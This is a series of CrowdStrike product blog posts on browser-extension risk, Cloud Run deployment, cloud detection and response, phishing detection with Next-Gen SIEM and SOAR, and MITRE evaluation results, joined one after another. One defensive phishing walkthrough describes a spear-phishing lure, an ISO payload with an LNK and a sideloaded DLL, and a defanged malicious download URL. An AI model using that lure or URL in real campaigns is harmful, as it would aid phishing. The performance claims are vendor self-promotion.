As workforce productivity increasingly depends on web-based applications, browsers have become essential gateways to the “connectivity economy.” According to recent data, 93% of desktop internet traffic in 2023 traversed through four popular web browsers.

With their diverse functionalities and use cases, browsers are the most used desktop applications. To further expand their utility, it’s common to install and use browser extensions: small software modules that enhance and personalize the functionality of web browsers. Users install them to tailor their browsing experience to better meet their needs and preferences, and they range from ad blockers and security tools to productivity enhancers and shopping assistants. Like regular applications, however, browser extensions can become sources of malware and be exploited by attackers, which means they carry significant risks.

In this blog, we’ll explore why browser extensions are particularly attractive to threat actors and how new capabilities in CrowdStrike Falcon® Exposure Management can help security teams detect and assess these risks to stay ahead of attackers.

What Makes Browser Extensions Problematic

When an end user installs a browser extension, the permissions granted open the door to a world of possibilities — and vulnerabilities. Depending on what’s allowed, these extensions can access a veritable treasure trove of information: everything from web traffic and saved credentials to session cookies, clipboard data and beyond. Though legitimate extensions often require such permissions to operate effectively, in the wrong hands, these permissions can become tools for exploitation, giving bad actors the keys to critical data and private information.

The rich data obtained through such means can subsequently be weaponized and monetized by criminals. For example, using privileged data, they can craft better phishing emails or use credentials harvested to carry out identity-based attacks.

CrowdStrike’s analysis of browser extensions in our production environments indicates that well over half of them require what may be considered excessive permissions. This means that these permissions carry strong risks, as they may allow threat actors to see all web traffic or manipulate browser tabs.

Further, because extensions are embedded into browser applications and do not create process start events, they can be harder to detect than ordinary desktop applications, allowing threat actors to obfuscate and persist their malicious activities.

How Adversaries Deploy Malicious Extensions

Extensions can be relatively easy to develop, but they don’t typically come with a web browser out of the box. Therefore, the act of deploying malicious extensions onto target victim browsers is an important part of the tradecraft. Adversaries achieve this by employing various tactics.

One common method is to list deceptive extensions on browser stores. Deception can be achieved in a number ways, including by mimicking legitimate well-known vendor product names or by publishing extensions with popular productivity purposes.

Another popular tactic is ownership takeover, where threat actors purchase or otherwise take over previously legitimate browser extensions that already have a user base and push out malicious updates to compromise target systems.

The most dangerous method is perhaps “sideloading,” which involves installing browser extensions from sources outside the official web store by directly adding the extension files. This method bypasses the usual safeguards that come with the browser stores. Attackers exploit this method by bundling malicious extensions with seemingly legitimate software applications. When users install these applications, the hidden extensions are also installed, granting attackers access to the users’ browser and data.

Even with the web store method, browser extensions can expand their permissions upon installation and download additional malicious payloads. This is a popular obfuscation tactic where adversaries publish extensions to web stores with minimal initial permission requirements but expand their footprint with harmful intentions. A case in point was the notorious PDF Toolbox malicious browser extension, which downloaded additional payloads upon installation to enhance its capabilities and persistence.

Falcon Exposure Management for Browser Extension Visibility

Fortunately, Falcon Exposure Management, a module of the AI-native CrowdStrike Falcon® cybersecurity platform, leverages its single, lightweight agent to provide comprehensive asset visibility and instant exposure assessment. This enables security teams to further close the security gap by detecting yet another source of exposure in the form of browser extension risks.

Extension Inventory

Detecting and cataloging the very existence of extensions is the first step toward understanding their risks. With Falcon Exposure Management, security teams can compile a comprehensive inventory of all extensions installed on Chrome and Edge browsers in their enterprise environment, whether it’s Windows or macOS. This capability doesn’t just list extensions, it offers insightful analytics, revealing extensions with the most and least installations, the most and least usage, and much more.

Extension Risk Assessment

From here, security teams can assess extension risks in a number of ways. For starters, installation methods are shown related to each extension, uncovering sideloaded applications and providing risk context.

Falcon Exposure Management also shows the vendor name captured from the extensions, which can range from legitimate well-known vendors all the way to those with missing artifacts in the name field. Web store listings for the extension, if found, are also provided.

Perhaps the most important measure of risk is the permission level associated with each extension. Because the types of permissions can be so varied, CrowdStrike computes a heuristics-based “permission severity” rating to facilitate the ease of assessment. For example, if the permission allows the extension to “intercept web traffic,” it’s assigned a permission severity of critical. Alternatively, if the permission allows the extension to control the browser tab, it’s assigned a level of high. Falcon Exposure Management provides detailed information on permissions along with the severity rating for ease of investigation.

For a security analyst evaluating extension risk, a sideloaded extension with a “critical” permission severity rating, no corresponding store listing and a missing vendor name can signal a suspicious extension requiring further evaluation or more aggressive intervention.

Taking Actions

Beyond these insights, customers benefit from the platform’s broader capabilities to take actions on these risks. For example, security teams have the ability to configure policies to automatically group browser extensions with critical permission severities into a particular host group. They can also trigger automated actions through the native CrowdStrike Falcon® Fusion SOAR workflows, such as creating tickets to alert IT system owners to investigate or remediate suspicious extensions. Security teams can also set up automated workflows to trigger notifications via email, Slack, etc., to keep teams in the loop.

With Falcon Exposure Management, these assessments take place seamlessly and instantaneously with the Falcon agent. This allows security teams to monitor their overall attack surface in its various forms, leaving adversaries nowhere to hide.

Get Started Today

If you’re an existing Falcon Exposure Management or CrowdStrike Falcon® Discover customer, give the browser inventory capability a try by going to Exposure Management > Applications > Dashboards to view the new browser extensions overview dashboard and see extension-specific data. If you’re not using these modules already, talk to your CrowdStrike representative to request a demo.

Additional Resources

• Visit the Falcon Exposure Management website to learn more.
• Schedule a Falcon Exposure Management demo.
• Register for a hands-on workshop: Empowering Proactive Protection with CrowdStrike Falcon Exposure Management.
• Watch the Falcon Exposure Management “Internet Exposure Identification” demo.
• See Falcon Exposure Management in action.
• Read the Falcon Exposure Management data sheet.

We’re thrilled to share that the CrowdStrike Falcon® sensor now fully supports Google Cloud Run, bringing advanced security capabilities to your serverless applications. While we announced this at Google Cloud Next in April 2024, this blog goes deeper into the integration and shares how customers leveraging Google Cloud Run and CrowdStrike can deploy Falcon quickly to enhance their serverless security requirements.

To recap, Google Cloud Run offers a powerful, fully managed platform for deploying containerized applications that scale automatically with demand. However, the dynamic and ephemeral nature of serverless environments poses unique security challenges. With the Falcon sensor now integrated with Google Cloud Run, organizations can leverage CrowdStrike’s industry-leading protection to secure their serverless workloads.

Enhanced Security for Serverless Applications

By supporting Google Cloud Run, the Falcon sensor ensures that your serverless applications benefit from the same robust security measures that protect traditional and cloud-based workloads. The AI-native CrowdStrike Falcon® cybersecurity platform provides real-time threat detection, automated incident response and comprehensive visibility into your serverless environment. This integration helps you identify and mitigate threats before they can impact your applications, ensuring continuous protection across your entire cloud infrastructure.

Seamless Integration and Continuous Protection

Deploying the Falcon sensor on Google Cloud Run is straightforward and seamless, allowing you to integrate security into your DevOps processes without compromising performance or agility. The sensor automatically scales with your workloads, providing consistent protection as your application demand fluctuates. This ensures that your security posture remains strong, regardless of the size or complexity of your serverless deployments.

Empowering DevSecOps with Real-Time Insights

With this new support, DevSecOps teams can now gain real-time insights into the security status of their serverless applications running on Google Cloud Run. The Falcon platform’s advanced analytics and threat intelligence capabilities empower teams to make informed decisions, swiftly respond to incidents and continuously improve their security practices. This proactive approach helps organizations maintain a secure and resilient application environment, fostering innovation and agility.

We’re excited about this expansion and look forward to helping our customers enhance their security posture in serverless environments. For more information on how to deploy and configure the Falcon sensor on Google Cloud Run, Falcon platform customers can read this official documentation.

Deployment Overview

Google Cloud Run is a fully managed serverless compute platform built from Knative that enables customers to run containers without the need to manage the underlying infrastructure. You can run your containers either fully managed with Google Cloud Run or in your Kubernetes Engine cluster with Google Cloud Run on Anthos. In Google Cloud Run, customers can deploy applications as jobs or services. The Falcon container sensor for Linux supports both job and service deployments.

The Falcon container sensor for Linux can extend runtime security to container workloads in Google Cloud Run because it runs in the user space with no code running in the kernel or the worker node OS.

 

Deploying the Falcon container sensor for Linux to Google Cloud Run requires modification of the application container image. The Falcon container sensor image contains a Falcon utility that supports patching the application container image with Falcon container sensor for Linux and its related dependencies.

The Falcon container consists of two components:

1. The Falcon container sensor for Linux: At runtime, the Falcon container sensor for Linux is launched inside the application container of the service or job. It uses unique technology to run in the application context.
2. Falcon utility: The Falcon utility runs offline and takes the application container image as an input to generate a new container image patched with the Falcon container sensor for Linux and its related dependencies. The Falcon utility also sets the Falcon entry point as the container entry point.

Here is an overview of the installation workflow:

1. Create an API client Key
2. Get your CrowdStrike CID with checksum
3. Retrieve the sensor image and push to Google Registry
4. Run the Falcon utility to build a new image
5. Push the new image to the registry
6. Deploy the Falcon container sensor for Linux to Google Cloud Run
7. Verify the sensor deployment

Once verification is over, you’re ready to go. For customers leveraging Google Cloud Run and CrowdStrike, this process is designed to make it easy to follow and deploy.

Here’s a more detailed step-by-step guide for customers using Falcon Cloud Security.

Shaping the Future of Cloud Security

The powerful combination of AI-powered cloud services from Google Cloud and the unified protection and threat hunting capabilities of the Falcon platform provides the security that organizations need to stop breaches in multi-cloud and multi-vendor environments.

As cloud threats and technology continue to evolve, staying ahead of threats is paramount. Modern businesses need allies to protect their cloud-based resources, applications and data as their reliance on cloud technology continues to grow. This synergy between CrowdStrike and Google Cloud will shape the future of cloud technology and security, setting a new standard for protecting today’s cloud environments.

Additional Resources

• Learn how Falcon Cloud Security can protect your Google Cloud resources.
• See why Forrester named CrowdStrike a Leader in The Forrester Wave: Cloud Workload Security, Q1 2024.
• Get a free Cloud Security Health Check and experience Falcon Cloud Security in action for yourself.

Adversaries are increasingly attacking cloud environments, as evidenced by a 75% surge in cloud intrusions year-over-year in 2023. They are also getting faster: The fastest breakout time was clocked at just over 2 minutes, according to the CrowdStrike 2024 Global Threat Report.

Today’s adversaries are outpacing legacy security approaches. Disjointed point solutions can’t scale or provide visibility into a rapidly growing attack surface. As organizations adopt more cloud applications and services, they need a modern approach to detect, identify and block adversary activity in the cloud.

An effective cloud detection and response (CDR) solution provides incident management at every stage — from detection to remediation — quickly neutralizing threats with precision and efficiency:

1. 24/7 cloud services including managed detection and response and threat hunting to monitor, analyze and neutralize cloud threats, providing complete incident lifecycle management from detection to remediation.
2. Cloud adversary intelligence to understand adversary behavior and tactics, techniques and procedures (TTPs) to prioritize and triage incidents faster.
3. A unified cloud-native application protection platform (CNAPP) to detect and actively stop cloud breaches in real time.

Let’s explore the key components you should be looking for in your CDR.

24/7 Cloud Managed Detection, Response and Threat Hunting

The cloud security landscape is full of challenges that often exceed the capabilities of automated systems alone. The complex nature of modern threats, and the understanding required to address them, highlights a shortfall in many organizations: a lack of skilled professionals well-versed in cloud security practices.

Integrating cloud managed detection and response into a CDR solution fills this critical gap. Seasoned security professionals can interpret and act on information from automated tools. These experts analyze, validate and prioritize threats, driving continuous enhancement of security measures and technology implementation.

 

Additionally, 24/7 cloud threat hunting services extend this proactive defense. Threat hunters work around the clock, ensuring constant vigilance over the entire cloud environment, including control plane activities and cloud runtime environments. Further, they need to monitor and prevent compromised users and credentials from being exploited in cloud attacks. And finally, cloud threat hunters must track lateral movement from cloud to endpoint, enabling rapid response and actionable insights for decisive remediation.

Adversary-based Threat Intelligence

As adversaries are becoming faster and more sophisticated, the importance of adversary-based threat intelligence helps security teams better understand their behavior and how to stop them. A CDR solution that uses adversary-based threat intelligence can significantly improve an organization’s detection and response capabilities.

Threat intelligence in the context of a CDR solution encompasses a wide array of information, ranging from indicators of attack (IOAs) to real-time data about emerging threats from adversaries around the world. Threat intelligence cannot be static — it is continuously updated based on new research and refined through machine learning algorithms and human analysis. A CDR solution using adversary-based intelligence can accelerate incident response by enabling security teams to more effectively anticipate, recognize and prioritize attacker behaviors.

 

Integrating adversary-based threat intelligence into a CDR solution can evolve its approach from a reactive defense to a confident and intelligence-driven defense, arming organizations with the knowledge and tools to combat sophisticated adversaries.

A Unified CNAPP

An organization can often find itself tangled up in the complexity of managing disparate tools to protect its cloud environments. This drives operational complexity and creates silos that impede the flow of crucial information, making it tough to build a full view of the organization’s cloud security posture. A unified cloud-native application protection platform (CNAPP) consolidates disparate tools into a single solution, bringing detection and response into the CDR framework.

A CDR should offer a CNAPP through a single agent and single platform. This removes the limitations of individual tools by offering end-to-end visibility across the cloud environment, enabling security teams to detect sophisticated attacks that might otherwise go unnoticed in a fragmented toolset. A unified CNAPP streamlines the workflow for incident response, allowing for faster mobilization against threats and more effective mitigation strategies.

 

A CNAPP enhances the efficiency of security operations while improving the effectiveness of each function. This holistic approach ensures every aspect of cloud security is addressed, from initial threat detection to final resolution, making it a critical factor to consider when selecting a CDR solution.

CrowdStrike’s Cloud Detection and Response Solution

A CDR solution is an essential piece in the fight against the latest adversary threats targeting the cloud. By providing detailed visibility, real-time monitoring, rapid response capabilities and integrated human expertise, CDR empowers organizations to proactively manage their security defenses in the complex and dynamic cloud environment.

CrowdStrike delivers the world’s only unified approach to cloud detection and response that brings together world-class adversary intelligence and elite 24/7 services with the industry’s most complete CNAPP.

With CrowdStrike’s CDR solution, organizations can:

• Reduce cloud risks before they escalate
• Detect threats with complete context
• Stop breaches and rapidly investigate
• Swiftly respond and recover

You can try Falcon Cloud Security for free through a Cloud Security Health Check. It provides instant, complete visibility into your entire cloud estate and deploys in minutes with zero impact to your business.

Additional Resources

• Read The Complete Guide to CNAPPs, presented by CrowdStrike.
• Learn more about how you can stop cloud breaches with CrowdStrike unified cloud security for multi-cloud and hybrid environments — all in one lightweight platform.
• Read about how CrowdStrike has been named a Leader in The Forrester Wave: Cloud Workload Security Q1, 2024.
• Take a free Cloud Security Health Check to visualize misconfigurations and other vulnerabilities in minutes.
• Learn how the powerful CrowdStrike Falcon platform provides comprehensive protection across your organization, workers and data, wherever they are located.

Phishing is the weapon of choice for many adversaries. And it’s easy to understand why: Users fall victim to attacks in under 60 seconds on average, novice cybercriminals can launch effective phishing campaigns thanks to off-the-shelf phishing kits and generative AI, and above all, it works — 71% of organizations reported at least one successful attack in 2023.

To defend against rampant phishing attacks, organizations require robust systems to detect, investigate and respond to phishing threats. This is where CrowdStrike Falcon® Next-Gen SIEM and CrowdStrike Falcon® Fusion SOAR can deliver tremendous value, allowing you to quickly stop threats from one unified platform.

This blog shares how Falcon Next-Gen SIEM helps stop phishing attacks and why we’re offering 10GB/day of free email data ingestion to jumpstart your next-gen SIEM journey.

Detect Phishing Attacks with Falcon Next-Gen SIEM

Falcon Next-Gen SIEM empowers you to detect phishing fast by consolidating your endpoint data and third-party data on the AI-native CrowdStrike Falcon® cybersecurity platform. With a robust ecosystem of data connectors and parsers, Falcon Next-Gen SIEM simplifies the ingestion of third-party data so you can quickly detect and stop attacks.

 

Legacy SIEMs burden security teams with complex and unwieldy lists of correlation rules, often developed years or decades ago. These rules create a flood of false positives, forcing specialized detection engineers to waste time tuning and maintaining them. Overwhelmed, many organizations turn to managed security service providers (MSSPs) with mixed results.

Falcon Next-Gen SIEM cuts through the pitfalls of outdated correlation rules. It delivers laser-accurate detection for both Falcon telemetry — including endpoint, cloud and identity data — and third-party logs. Crafted by CrowdStrike experts with industry-leading adversary research, our out-of-the-box correlation rules align with MITRE ATT&CK®, helping you detect attack techniques across the cyber kill chain. Your team can easily customize rules with a unified language for search, parsing and dashboards.

Monitor Threats with Live Dashboards

Next, it’s helpful to discuss how live dashboards can help you identify top threats and analyze trends to improve your security posture.

Falcon Next-Gen SIEM’s dashboard capability allows you to create custom dashboards from queries, providing at-a-glance data visualization for quick decision-making. You can view aggregated data from various email sources based on common fields and use interactions to drill down into vendor-specific data and fields.

Investigate and Respond with Falcon Fusion SOAR

Workflow automation offers numerous benefits, including reduced mean time to respond (MTTR), enhanced team efficiency and cost savings.

Phishing is an ideal starting point for workflow automation due to the repetition in phishing investigations and the need for consistent responses and swift action. With Falcon Fusion SOAR, the no-code orchestration, automation and response capability built into the Falcon platform, you can quickly reap the benefits of automation, empowering your team to respond more effectively to phishing threats.

With more than 125 pre-built actions and the ability to execute actions directly on the endpoint with CrowdStrike Falcon® Insight XDR, Falcon Fusion SOAR lets you orchestrate incident response across your SOC. You can easily build workflows to automatically investigate the contents of suspicious emails or reset compromised credentials, allowing your team to save valuable time and focus on higher priorities. Workflows can run on-demand or trigger automatically based on a detection or a predefined schedule.

 

Falcon Fusion SOAR provides out-of-the-box playbook templates to simplify workflow automation. Predefined templates can be easily customized to align to your organization’s security policies and technologies.

The Incident Workbench enhances incident visualization and team collaboration. It illustrates the relationships and connections between entities, providing a clear view of the attack’s progression. Clicking on the graph reveals detailed information on each entity, including sender details, malicious URLs, indicators of compromise and relevant threat actors.

 

A prebuilt SOAR dashboard helps you monitor team performance, executed workflows, related detections and MTTR trends. By continuously measuring your phishing KPIs, you can make ongoing improvements to your detection and response capabilities, shifting from a reactive to a proactive security approach.

Get Started with 10GB of Free Email Data Ingestion

Phishing attacks remain a persistent threat to organizations. The Falcon platform seamlessly integrates data, AI, workflow automation and threat intelligence on a unified platform for full visibility and protection against cyberthreats, including phishing attacks.

Email data can be a rich source of information for uncovering malicious activity. Starting today, Falcon Insight XDR customers get 10GB per day of free email data ingestion to kickstart their SOC transformation and realize the power of combining Falcon platform data with third-party data to detect phishing schemes, accelerate investigations and meet compliance requirements.

Contact your sales representative or technical account manager to learn more about this offering.

Additional Resources

• Read this technical blog to start ingesting email data into Falcon Next-Gen SIEM.
• Learn about key benefits of next-gen SIEM in the Falcon Next-Gen SIEM data sheet.
• Sign up to attend our Next-Gen SIEM Showcase.
• Read the Complete Guide to Next-Gen SIEM to learn how to modernize your SOC.
• Want to learn more about Falcon Fusion SOAR? Read the data sheet or visit the product page.

Phishing is a formidable–and financially devastating–threat costing organizations $4.76 million USD per breach on average.  With a simple, deceptive email, adversaries can masquerade as trusted entities, tricking even savvy individuals into handing over their credentials and other sensitive information. Whether it’s a duplicitous link or a crafty call to action, phishing remains one of the most insidious cybersecurity threats, leveraging a vulnerability that can’t be patched: human nature.

CrowdStrike Falcon^® Next-Gen SIEM helps security teams detect and stop email-based attacks. By analyzing email security logs, SOC analysts can identify unusual attachments, malicious links, or email addresses to uncover attacks and speed up investigations. Email data allows analysts to trace the root cause of an attack, identify compromised accounts, and understand attackers’ methods.

This blog post demonstrates how simple it is to ingest data with Falcon Next-Gen SIEM. Then, it explains how to detect and counter phishing threats with Falcon Next-Gen SIEM, Falcon Fusion SOAR, and email data from Abnormal Security.

Maximize Your 10GB/Day Plan by Onboarding Email Data

Falcon Next-Gen SIEM transforms security operations to stop breaches by bringing together data, AI, workflow automation, and threat intelligence on one platform with one console and one lightweight endpoint agent.

To accelerate SOC transformation, Falcon Insight customers can ingest up to 10 gigabytes of third-party data per day at no additional cost, and experience the power and performance of Falcon Next-Gen SIEM. The 10GB/day offering is available today to the first wave of Falcon Insight customers and it will be released in waves to remaining customers over the next several weeks. 

Make the most of your 10GB/day plan by ingesting high-value data, such as email security logs, into the Falcon platform to stop email-based threats. You can onboard email data using out-of-the-box integrations with email security solutions from Abnormal Security, Mimecast, and Proofpoint. An expanding array of data connectors support a broad set of log sources, while an HTTP event collector (HEC) lets you ingest data using prebuilt or custom parsers.

 

 

With Abnormal Security, data ingestion can be set up in just minutes. Start by generating an API token in the Abnormal administrator console; see the Falcon Next-Gen SIEM documentation for step-by-step instructions.

Next, create a new connector in the Falcon console by navigating to Next-Gen SIEM > Log management > Data onboarding and select the Abnormal Security Data Connector.

 

 

Enter the API key you generated, and Falcon Next-Gen SIEM will automatically connect to Abnormal and start ingesting data. Check out Falcon Next-Gen SIEM technical documentation for more detailed information on how to onboard data.

Defeating a Targeted Email Attack with Falcon Next-Gen SIEM 

To illustrate how Falcon Next-Gen SIEM helps you combat email-based threats, let’s consider a scenario where an advanced adversary targets your organization–in this example, a high-interest think tank. The adversary’s primary goal is to infiltrate your organization and gather insights. The advanced persistent threat (APT) poses as a US-based reporter inquiring about a fabricated threat assessment, targeting an employee at your think tank. Let’s explore the details of the attack:

First, the threat actor builds out a payload containing the following files within it.

• Malicious LNK (shortcut) file that will execute the included malware if run
• Malware packaged as a side-loaded DLL

The malware is bundled into the following file and hosted on a remote web server.

• Annual_Threat_Assessment_of_the_US_Intelligence_Community.pdf.iso

Then, the threat actor crafts the following email to target a member of your think tank.

 

 

This email attempts to entice the victim into opening the included link, as the purported included document appears to be malformed. The embedded URL points to the following link.

• http://goijosijdfouhofejwoijfoijoixyz[.]xyz/files/64019238/Annual_Threat_Assessment_of_the_US_Intelligence_Community.pdf.iso

Upon receiving this email, the victim clicks the malicious link, launching a new Chrome browser.

 

 

Detecting Malicious Activity

Behind the scenes, multiple third-party security products are monitoring the attack and generating detections. Your organization’s Abnormal Security platform examines the email message and flags it as suspicious.

 

 

Using AI machine learning models, it identifies unique or otherwise notable strings within the email and flags them for your security analyst.

 

 

Once the email data is forwarded from Abnormal Security to CrowdStrike Falcon Next-Gen SIEM, you can view it in Advanced Event Search. This will be retained in the platform for 7 days with the 10GB/day plan, and can be stored for months or years with an optional Falcon Next-Gen SIEM subscription. Your security analysts can query the data using the intuitive and flexible CrowdStrike Query Language.

In addition to collecting email data, your team is ingesting Falcon telemetry from your endpoints. This telemetry provides visibility into DNS activity.

 

 

By combining these two datasets, you can identify instances where a domain from a flagged email has been accessed. Enrich your findings with CrowdStrike threat intelligence and known indicators of compromise. To detect future threats and generate high-fidelity alerts, create a new correlation rule indicating malicious activity.

 

 

This correlation rule generates an alert when the victim attempts to access the domain included in the malicious email.

 

 

Data Visualization

You can visualize email data with custom and pre-built dashboards in Falcon Next-Gen SIEM. A versatile dashboard builder lets you select from a broad spectrum of visualization chart options and use advanced queries to create tailored dashboards.

 

 

Threat Investigation

The Incident Workbench visualizes the attack in a graph view, providing context about the entities involved. It lists key details such as users, senders, recipients, and host information.

 

 

Your team can quickly understand relevant email information by viewing incident details. 

 

 

By pivoting on the host communicating with a remote server, you can identify the last logged-in user responsible for this network activity.

 

Incident Response 

With Falcon Fusion SOAR, you can easily isolate the compromised host and prevent further malicious activity using workflow automation. 

You can build a workflow by simply selecting the trigger, defining the conditions and configuring the actions. Falcon Fusion SOAR workflows can be triggered automatically based on a detection, on-demand when immediate response is necessary, or scheduled for routine tasks and assessments.

In this scenario, the workflow is triggered on-demand. If the “Host ID” condition is met, the workflow gathers the device details and sends an email to a senior engineer for review. If the senior engineer approves, the device will be contained. If not, the device remains uncontained, and an email documenting the actions is sent.

 

 

Additionally, Falcon Fusion SOAR offers numerous out-of-the-box phishing playbooks that can be customized to fit your organization’s requirements and technology stack.

In this scenario, multiple employees at your organization were targeted, and one reported the email as a “phishing email.” Your security team leveraged a new out-of-the-box phishing playbook template included in Falcon Fusion SOAR. Note that this playbook is not available with the 10GB/day plan; it requires the purchase of a Falcon Next-Gen SIEM subscription.

The phishing playbook template triggers upon receiving a phishing email notice from Microsoft 365. If the condition is met, the workflow writes to the log repository and initiates the investigation process. It enriches the data by searching all email components, submitting the URL for sandbox detonation, and conducting file hash lookups using VirusTotal.

 

 

If VirusTotal confirms malicious indicators, the workflow will call on the threat graph to kill the process. If the sender domain is suspicious, then the workflow has the capability to update third-party tools like Proofpoint. For risky URLs and IP addresses, the workflow will create custom IOCs to start a retroactive search.

Falcon Next-Gen SIEM offers unmatched efficiency in stopping phishing attacks by accurately detecting threats, visualizing high-risk activity in live dashboards, automating repetitive tasks, and streamlining investigations. With Falcon Next-Gen SIEM, threat detection and response has never been easier.

If you’re a Falcon Insight customer, you can extend the visibility and protection of the Falcon platform to third-party data with the 10GB/day plan. Discover how you can achieve up to 150x faster search performance and up to 80% lower cost than legacy SIEM solutions with Falcon Next-Gen SIEM. Speak to your CrowdStrike account representative to learn how you can modernize your SOC with the next generation of SIEM technology.

Additional resources:

• Check out technical documentation: See the Falcon Next-Gen SIEM User Guide, including information about third-party data ingestion.
• Start onboarding data today: Take the Next-Gen SIEM fundamentals course (CrowdStrike University subscription required) and watch these Next-Gen SIEM intro videos.
• Watch demo videos: Learn how to detect, investigate and stop threats with Falcon Next-Gen SIEM by viewing fast-paced demos.
• Reached your 10GB daily limit? Contact us to upgrade your subscription and experience Falcon Next-Gen SIEM without constraints.

According to the CrowdStrike 2024 Global Threat Report, the fastest recorded eCrime breakout time was just 2 minutes and 7 seconds in 2023. This underscores the need to equip security analysts with modern tools that level the playing field and enable them to work more efficiently and effectively.

Today’s analysts require a new generation of security information and event management (SIEM) technology capable of scaling to manage petabytes of data, working seamlessly with security orchestration, automation and response (SOAR) capabilities to stop breaches.

CrowdStrike Falcon® Fusion SOAR, the no-code orchestration, automation and response capability built into the CrowdStrike Falcon® platform, is now available to enable workflow automation for third-party data with CrowdStrike Falcon® Next-Gen SIEM. Legacy SIEMs have failed the SOC, but Falcon Next-Gen SIEM introduces a new approach to eliminate slow queries, complex architectures and costly data ingestion. With its new features and enhancements, Falcon Fusion SOAR is well-positioned to help your security team realize the benefits that automation can deliver.

Elevate SOC Efficiency and Accuracy with Workflow Automation

Security automation is your secret weapon to stopping attacks and improving your bottom line. It reduces the time needed to respond to threats, cuts the costs of integrating and operating tools, and improves your security analysts’ job satisfaction by eliminating repetitive tasks, allowing the team to focus on higher-level responsibilities that cannot be automated.

Automation can significantly enhance the efficiency of the SOC. While SIEMs excel at detecting threats by analyzing vast amounts of data, they still force security analysts to manually triage detections and filter out false positives. Many investigation tasks are repetitive and time-consuming, keeping teams from stopping real threats quickly. This is where SOAR steps in to boost efficiency, driving detections to resolution and establishing a continuous information loop.

Enhance Security Operations from Detection to Action

Falcon Fusion SOAR slashes response times during an investigation — when every second counts. It not only improves the technical effectiveness of security operations by working as a cohesive unit but also optimizes operational efficiency by breaking down information silos and eliminating data transfer delays. It ensures that data flows seamlessly and bi-directionally between Falcon Next-Gen SIEM and Falcon Fusion SOAR to act on the most current information available, providing you with a real-time view of your security posture and a feedback loop for continuous improvement.

Falcon Fusion SOAR can query both Falcon platform data as well as third-party data in Falcon Next-Gen SIEM to further threat investigations and store data, such as query results, ensuring that security teams have the most up-to-date view of their data. It also accelerates responses, as Falcon Fusion SOAR can execute workflows that are automatically from a Falcon Next-Gen SIEM detection, scheduled for continuous protection or launched on-demand in response to critical threats.

Additionally, Falcon Fusion SOAR has the ability to drive workflow automation based on Falcon platform alerts and data, such as endpoint, cloud and identity, as well as third-party data collected by Falcon Next-Gen SIEM. This consolidated solution provides you with unrivaled visibility into your data and significantly reduces the time spent on detection, investigation and response.

Empowering Security Teams with No-Code Workflow Automation

Security analysts are often overwhelmed by the high number of alerts they must triage and respond to. While workflow automation is a powerful tool that can simplify security processes, cumbersome playbook development can hinder progress. Implementing orchestration and automation requires clearly defined processes, a deep understanding of the technologies being orchestrated and knowledge on how to translate these into automated processes. And often, complex decisions require human involvement. Given the advanced skills required to code playbooks and the scarcity of security talent, security teams need tools that prioritize a modern analyst experience and offer a significant advantage against adversaries.

As a native capability of Falcon Next-Gen SIEM, Falcon Fusion SOAR provides analysts with a unified experience that combines world-class security data and workflow automation to stop breaches. The newly redesigned workflow builder allows security analysts to easily visualize their workflows as they build them with an intuitive top to bottom flow for improved readability and usability. Analysts can simply select different building blocks without needing to code, making automation accessible even to more junior analysts.

 

Depending on the complexity of the workflow, building it can only take only a few minutes. Once the use case has been identified, analysts need to select a trigger, define conditions and configure the actions. Falcon Fusion SOAR supports the orchestration of complex use cases with conditional branching and logic, and by seamlessly integrating with Falcon Real Time Response (RTR) to execute any action on the endpoint. When key decision making and approvals are necessary, team members can be notified via email, Slack or your preferred communication method as part of the workflow.

To give your team a headstart, Falcon Fusion SOAR offers a growing library of out-of-the-box playbooks for common use cases. These playbook templates can be easily customized to meet your organization’s policies and technology stack.

Falcon Fusion SOAR recently released a new phishing integration and playbook to help your team automate response to emails reported as phishing by employees in your organization.The workflow integrates with MS365, authorizing Falcon Fusion to have read-only access to your organizations’ phishing inbox. When an email is reported as phishing, the workflow begins the investigation process by searching all email components for enrichment. If malicious indicators are identified, the workflow will quarantine or block indicators, update third-party tools and create custom IOCs to start a retroactive search.

Optimize Incident Response with Workflow Automation Insights

Workflow automation helps security teams cut mean time to respond (MTTR) by gathering and enriching data, guiding analysts through investigations and orchestrating, and automatically remediating attacks. It also reduces the risk of human error by driving consistent, standardized actions. Additionally, it has the potential to improve your security posture by providing insights into trends and execution, helping to better understand performance, enhance collaboration and identify areas of improvement.

Falcon Fusion SOAR offers at-a-glance insights through a metrics dashboard that enables you to view detailed workflow executions, including the various actions executed by each workflow, and related detections. This comprehensive information, along with other trends, enhances the understanding of the status and context of an incident. All of this information is readily available in a unified view within the Falcon platform, thereby reducing “swivel-chair syndrome” for your team and allowing them to concentrate efforts on the most critical threats.

Next-Level Threat Management with Falcon Next-Gen SIEM

With its native SOAR capabilities powered by Falcon Fusion SOAR, Falcon Next-Gen SIEM accelerates threat detection, investigation and response — all from a single console. This gives your team the speed to keep pace with adversaries and the focus to address the threats that put your organization at risk.

Additional Resources

• Want to learn more about Falcon Fusion? Visit the Falcon Fusion SOAR product page.
• Download the Falcon Fusion SOAR data sheet to learn about our integrated SIEM and SOAR capabilities.
• Sign up to attend our Next-Gen SIEM Showcase to see Falcon Next-Gen SIEM and Falcon Fusion SOAR in action.
• Sign up to request a test drive of Falcon Next-Gen SIEM to see how Falcon Fusion SOAR augments the module.
• Watch on demand: CrowdStrike’s AI-Native SOC Summit: The Next Generation of SIEM, Here Today
• Read our SOC Survival Guide to learn how to revolutionize your SOC.

Security teams must outpace increasingly fast and sophisticated adversaries to stay ahead. In the most recent closed-book MITRE Engenuity ATT&CK® Evaluations: Managed Services, the CrowdStrike Falcon® platform once again demonstrated it stands alone in its ability to deliver the speed and efficacy needed to stop breaches.

• CrowdStrike Falcon Complete® managed detection and response (MDR) sets a new speed benchmark, scoring the fastest mean time to detect (MTTD) at just 4 minutes — 6 to 11 times faster than competitive vendors.
• CrowdStrike achieved the highest detection coverage score for the second consecutive year.

MITRE’s closed-book evaluation emulated a real-world eCrime attack without giving vendors prior knowledge of the threat scenario — creating the most accurate assessment of a vendor’s capabilities. In this scenario, prevention capabilities of the Falcon agent were not permitted. The Falcon platform was operating in detect-only mode, meaning no automated actions could be taken to kill processes.

MITRE does not rank or rate participants — the following is CrowdStrike’s analysis of the results provided by MITRE Engenuity.

We believe these results clearly demonstrate that the powerful combination of the Falcon platform, CrowdStrike’s elite team of experts and our knowledge of the adversary stands alone in the industry when it comes to stopping breaches. The Falcon platform once again achieved the highest detection coverage and fastest mean time to detect at just 4 minutes — an exceptional performance 6-11x faster than comparative vendors.

